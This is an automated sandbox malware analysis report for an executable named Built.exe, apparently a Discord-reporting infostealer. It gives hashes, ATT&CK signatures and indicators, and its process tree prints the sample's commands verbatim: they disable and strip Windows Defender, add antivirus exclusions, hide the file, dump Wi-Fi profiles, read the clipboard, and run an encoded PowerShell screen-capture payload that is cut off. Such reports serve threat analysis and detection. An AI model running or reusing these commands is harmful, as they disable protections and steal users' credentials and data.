b44e3d50118aa8fab2c74773ca8fd3d57823ee57749cf7ff270a72c381fd2ced

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2025 22:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

5.9MB
MD5

0c8895de04558da8d5e7b6ea9af319a3
SHA1

a11a7dbb476a08ade3209041ea224e1d64c34430
SHA256

b44e3d50118aa8fab2c74773ca8fd3d57823ee57749cf7ff270a72c381fd2ced
SHA512

11a31f673ddd8fafcc86f7b337250a041fd0c2a968cc13783caa8bb3c7cecd1fef514c1be0ec29b6888cdc4c7ea21299ac7b8a983b8981b444d446ec41718a23
SSDEEP

98304:k7vfrAEHIhSQHXXi65sn6Wfz7pnxCb3AtZC0VZHtKpbzL8SG2XATHbm9Ck6n/yg4:43rAEoYQHJDOYbwtZVZibPpG2QrbsC5W

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2812	powershell.exe
1040	powershell.exe
4816	powershell.exe
2124	powershell.exe
2232	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2976	cmd.exe
2316	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3940	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe
2712	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2296	tasklist.exe
4440	tasklist.exe
460	tasklist.exe
4996	tasklist.exe
884	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1916	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cc7-21.dat	upx
behavioral2/memory/2712-25-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp	upx
behavioral2/files/0x0007000000023cba-27.dat	upx
behavioral2/files/0x0007000000023cc5-29.dat	upx
behavioral2/memory/2712-30-0x00007FF96E110000-0x00007FF96E134000-memory.dmp	upx
behavioral2/memory/2712-48-0x00007FF971AD0000-0x00007FF971ADF000-memory.dmp	upx
behavioral2/files/0x0007000000023cc1-47.dat	upx
behavioral2/files/0x0007000000023cc0-46.dat	upx
behavioral2/files/0x0007000000023cbf-45.dat	upx
behavioral2/files/0x0007000000023cbe-44.dat	upx
behavioral2/files/0x0007000000023cbd-43.dat	upx
behavioral2/files/0x0007000000023cbc-42.dat	upx
behavioral2/files/0x0007000000023cbb-41.dat	upx
behavioral2/files/0x0007000000023cb9-40.dat	upx
behavioral2/files/0x0007000000023ccc-39.dat	upx
behavioral2/files/0x0007000000023ccb-38.dat	upx
behavioral2/files/0x0007000000023cca-37.dat	upx
behavioral2/files/0x0007000000023cc6-34.dat	upx
behavioral2/files/0x0007000000023cc4-33.dat	upx
behavioral2/memory/2712-54-0x00007FF969A90000-0x00007FF969ABD000-memory.dmp	upx
behavioral2/memory/2712-57-0x00007FF969A70000-0x00007FF969A89000-memory.dmp	upx
behavioral2/memory/2712-58-0x00007FF969A50000-0x00007FF969A6F000-memory.dmp	upx
behavioral2/memory/2712-60-0x00007FF95A850000-0x00007FF95A9B9000-memory.dmp	upx
behavioral2/memory/2712-62-0x00007FF969A30000-0x00007FF969A49000-memory.dmp	upx
behavioral2/memory/2712-64-0x00007FF96DED0000-0x00007FF96DEDD000-memory.dmp	upx
behavioral2/memory/2712-66-0x00007FF969A00000-0x00007FF969A2E000-memory.dmp	upx
behavioral2/memory/2712-74-0x00007FF96E110000-0x00007FF96E134000-memory.dmp	upx
behavioral2/memory/2712-78-0x00007FF96D9C0000-0x00007FF96D9CD000-memory.dmp	upx
behavioral2/memory/2712-81-0x00007FF95A3B0000-0x00007FF95A4C8000-memory.dmp	upx
behavioral2/memory/2712-80-0x00007FF969A50000-0x00007FF969A6F000-memory.dmp	upx
behavioral2/memory/2712-76-0x00007FF9699E0000-0x00007FF9699F4000-memory.dmp	upx
behavioral2/memory/2712-72-0x00007FF95A4D0000-0x00007FF95A847000-memory.dmp	upx
behavioral2/memory/2712-71-0x00007FF95B780000-0x00007FF95B837000-memory.dmp	upx
behavioral2/memory/2712-70-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp	upx
behavioral2/memory/2712-109-0x00007FF95A850000-0x00007FF95A9B9000-memory.dmp	upx
behavioral2/memory/2712-181-0x00007FF969A30000-0x00007FF969A49000-memory.dmp	upx
behavioral2/memory/2712-275-0x00007FF969A00000-0x00007FF969A2E000-memory.dmp	upx
behavioral2/memory/2712-277-0x00007FF95B780000-0x00007FF95B837000-memory.dmp	upx
behavioral2/memory/2712-278-0x00007FF95A4D0000-0x00007FF95A847000-memory.dmp	upx
behavioral2/memory/2712-295-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp	upx
behavioral2/memory/2712-301-0x00007FF95A850000-0x00007FF95A9B9000-memory.dmp	upx
behavioral2/memory/2712-300-0x00007FF969A50000-0x00007FF969A6F000-memory.dmp	upx
behavioral2/memory/2712-296-0x00007FF96E110000-0x00007FF96E134000-memory.dmp	upx
behavioral2/memory/2712-330-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp	upx
behavioral2/memory/2712-345-0x00007FF95AD70000-0x00007FF95B1DE000-memory.dmp	upx
behavioral2/memory/2712-370-0x00007FF95A4D0000-0x00007FF95A847000-memory.dmp	upx
behavioral2/memory/2712-369-0x00007FF95B780000-0x00007FF95B837000-memory.dmp	upx
behavioral2/memory/2712-368-0x00007FF969A00000-0x00007FF969A2E000-memory.dmp	upx
behavioral2/memory/2712-367-0x00007FF96DED0000-0x00007FF96DEDD000-memory.dmp	upx
behavioral2/memory/2712-366-0x00007FF969A30000-0x00007FF969A49000-memory.dmp	upx
behavioral2/memory/2712-365-0x00007FF95A850000-0x00007FF95A9B9000-memory.dmp	upx
behavioral2/memory/2712-364-0x00007FF969A50000-0x00007FF969A6F000-memory.dmp	upx
behavioral2/memory/2712-363-0x00007FF969A70000-0x00007FF969A89000-memory.dmp	upx
behavioral2/memory/2712-362-0x00007FF969A90000-0x00007FF969ABD000-memory.dmp	upx
behavioral2/memory/2712-361-0x00007FF971AD0000-0x00007FF971ADF000-memory.dmp	upx
behavioral2/memory/2712-360-0x00007FF96E110000-0x00007FF96E134000-memory.dmp	upx
behavioral2/memory/2712-359-0x00007FF95A3B0000-0x00007FF95A4C8000-memory.dmp	upx
behavioral2/memory/2712-358-0x00007FF96D9C0000-0x00007FF96D9CD000-memory.dmp	upx
behavioral2/memory/2712-357-0x00007FF9699E0000-0x00007FF9699F4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4100	cmd.exe
3892	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4824	cmd.exe
1560	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1468	WMIC.exe
4360	WMIC.exe
1136	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3540	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3892	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2812	powershell.exe
2124	powershell.exe
2812	powershell.exe
2124	powershell.exe
2232	powershell.exe
2232	powershell.exe
2316	powershell.exe
2316	powershell.exe
2316	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
1040	powershell.exe
1040	powershell.exe
4700	powershell.exe
4700	powershell.exe
4816	powershell.exe
4816	powershell.exe
4292	powershell.exe
4292	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4996	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3596	WMIC.exe
Token: SeSecurityPrivilege	3596	WMIC.exe
Token: SeTakeOwnershipPrivilege	3596	WMIC.exe
Token: SeLoadDriverPrivilege	3596	WMIC.exe
Token: SeSystemProfilePrivilege	3596	WMIC.exe
Token: SeSystemtimePrivilege	3596	WMIC.exe
Token: SeProfSingleProcessPrivilege	3596	WMIC.exe
Token: SeIncBasePriorityPrivilege	3596	WMIC.exe
Token: SeCreatePagefilePrivilege	3596	WMIC.exe
Token: SeBackupPrivilege	3596	WMIC.exe
Token: SeRestorePrivilege	3596	WMIC.exe
Token: SeShutdownPrivilege	3596	WMIC.exe
Token: SeDebugPrivilege	3596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3596	WMIC.exe
Token: SeRemoteShutdownPrivilege	3596	WMIC.exe
Token: SeUndockPrivilege	3596	WMIC.exe
Token: SeManageVolumePrivilege	3596	WMIC.exe
Token: 33	3596	WMIC.exe
Token: 34	3596	WMIC.exe
Token: 35	3596	WMIC.exe
Token: 36	3596	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3596	WMIC.exe
Token: SeSecurityPrivilege	3596	WMIC.exe
Token: SeTakeOwnershipPrivilege	3596	WMIC.exe
Token: SeLoadDriverPrivilege	3596	WMIC.exe
Token: SeSystemProfilePrivilege	3596	WMIC.exe
Token: SeSystemtimePrivilege	3596	WMIC.exe
Token: SeProfSingleProcessPrivilege	3596	WMIC.exe
Token: SeIncBasePriorityPrivilege	3596	WMIC.exe
Token: SeCreatePagefilePrivilege	3596	WMIC.exe
Token: SeBackupPrivilege	3596	WMIC.exe
Token: SeRestorePrivilege	3596	WMIC.exe
Token: SeShutdownPrivilege	3596	WMIC.exe
Token: SeDebugPrivilege	3596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3596	WMIC.exe
Token: SeRemoteShutdownPrivilege	3596	WMIC.exe
Token: SeUndockPrivilege	3596	WMIC.exe
Token: SeManageVolumePrivilege	3596	WMIC.exe
Token: 33	3596	WMIC.exe
Token: 34	3596	WMIC.exe
Token: 35	3596	WMIC.exe
Token: 36	3596	WMIC.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeIncreaseQuotaPrivilege	1136	WMIC.exe
Token: SeSecurityPrivilege	1136	WMIC.exe
Token: SeTakeOwnershipPrivilege	1136	WMIC.exe
Token: SeLoadDriverPrivilege	1136	WMIC.exe
Token: SeSystemProfilePrivilege	1136	WMIC.exe
Token: SeSystemtimePrivilege	1136	WMIC.exe
Token: SeProfSingleProcessPrivilege	1136	WMIC.exe
Token: SeIncBasePriorityPrivilege	1136	WMIC.exe
Token: SeCreatePagefilePrivilege	1136	WMIC.exe
Token: SeBackupPrivilege	1136	WMIC.exe
Token: SeRestorePrivilege	1136	WMIC.exe
Token: SeShutdownPrivilege	1136	WMIC.exe
Token: SeDebugPrivilege	1136	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1136	WMIC.exe
Token: SeRemoteShutdownPrivilege	1136	WMIC.exe
Token: SeUndockPrivilege	1136	WMIC.exe
Token: SeManageVolumePrivilege	1136	WMIC.exe
Token: 33	1136	WMIC.exe
Token: 34	1136	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 560 wrote to memory of 2712	560	Built.exe	84
PID 560 wrote to memory of 2712	560	Built.exe	84
PID 2712 wrote to memory of 4804	2712	Built.exe	85
PID 2712 wrote to memory of 4804	2712	Built.exe	85
PID 2712 wrote to memory of 772	2712	Built.exe	86
PID 2712 wrote to memory of 772	2712	Built.exe	86
PID 2712 wrote to memory of 3852	2712	Built.exe	88
PID 2712 wrote to memory of 3852	2712	Built.exe	88
PID 2712 wrote to memory of 1804	2712	Built.exe	91
PID 2712 wrote to memory of 1804	2712	Built.exe	91
PID 2712 wrote to memory of 928	2712	Built.exe	92
PID 2712 wrote to memory of 928	2712	Built.exe	92
PID 1804 wrote to memory of 4996	1804	cmd.exe	93
PID 1804 wrote to memory of 4996	1804	cmd.exe	93
PID 928 wrote to memory of 3596	928	cmd.exe	94
PID 928 wrote to memory of 3596	928	cmd.exe	94
PID 772 wrote to memory of 2812	772	cmd.exe	95
PID 772 wrote to memory of 2812	772	cmd.exe	95
PID 3852 wrote to memory of 3652	3852	cmd.exe	96
PID 3852 wrote to memory of 3652	3852	cmd.exe	96
PID 4804 wrote to memory of 2124	4804	cmd.exe	97
PID 4804 wrote to memory of 2124	4804	cmd.exe	97
PID 2712 wrote to memory of 3916	2712	Built.exe	138
PID 2712 wrote to memory of 3916	2712	Built.exe	138
PID 3916 wrote to memory of 3660	3916	cmd.exe	100
PID 3916 wrote to memory of 3660	3916	cmd.exe	100
PID 2712 wrote to memory of 5076	2712	Built.exe	101
PID 2712 wrote to memory of 5076	2712	Built.exe	101
PID 5076 wrote to memory of 3936	5076	cmd.exe	102
PID 5076 wrote to memory of 3936	5076	cmd.exe	102
PID 2712 wrote to memory of 1280	2712	Built.exe	103
PID 2712 wrote to memory of 1280	2712	Built.exe	103
PID 1280 wrote to memory of 1136	1280	cmd.exe	145
PID 1280 wrote to memory of 1136	1280	cmd.exe	145
PID 2712 wrote to memory of 4480	2712	Built.exe	105
PID 2712 wrote to memory of 4480	2712	Built.exe	105
PID 4480 wrote to memory of 1468	4480	cmd.exe	106
PID 4480 wrote to memory of 1468	4480	cmd.exe	106
PID 2712 wrote to memory of 1916	2712	Built.exe	107
PID 2712 wrote to memory of 1916	2712	Built.exe	107
PID 2712 wrote to memory of 1048	2712	Built.exe	109
PID 2712 wrote to memory of 1048	2712	Built.exe	109
PID 1048 wrote to memory of 2232	1048	cmd.exe	111
PID 1048 wrote to memory of 2232	1048	cmd.exe	111
PID 1916 wrote to memory of 2184	1916	cmd.exe	112
PID 1916 wrote to memory of 2184	1916	cmd.exe	112
PID 2712 wrote to memory of 1008	2712	Built.exe	114
PID 2712 wrote to memory of 1008	2712	Built.exe	114
PID 2712 wrote to memory of 212	2712	Built.exe	115
PID 2712 wrote to memory of 212	2712	Built.exe	115
PID 1008 wrote to memory of 884	1008	cmd.exe	116
PID 1008 wrote to memory of 884	1008	cmd.exe	116
PID 212 wrote to memory of 2296	212	cmd.exe	117
PID 212 wrote to memory of 2296	212	cmd.exe	117
PID 2712 wrote to memory of 684	2712	Built.exe	118
PID 2712 wrote to memory of 684	2712	Built.exe	118
PID 684 wrote to memory of 3108	684	cmd.exe	119
PID 684 wrote to memory of 3108	684	cmd.exe	119
PID 2712 wrote to memory of 2976	2712	Built.exe	120
PID 2712 wrote to memory of 2976	2712	Built.exe	120
PID 2712 wrote to memory of 4408	2712	Built.exe	121
PID 2712 wrote to memory of 4408	2712	Built.exe	121
PID 2976 wrote to memory of 2316	2976	cmd.exe	122
PID 2976 wrote to memory of 2316	2976	cmd.exe	122

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2184	attrib.exe
976	attrib.exe
4840	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:560
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Press Ok To Inject', 0, '.', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Press Ok To Inject', 0, '.', 32+16);close()"
      4⤵
      PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1804
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3916
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5076
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1008
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:212
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:684
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4408
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3888
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4824
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3492
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4452
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0A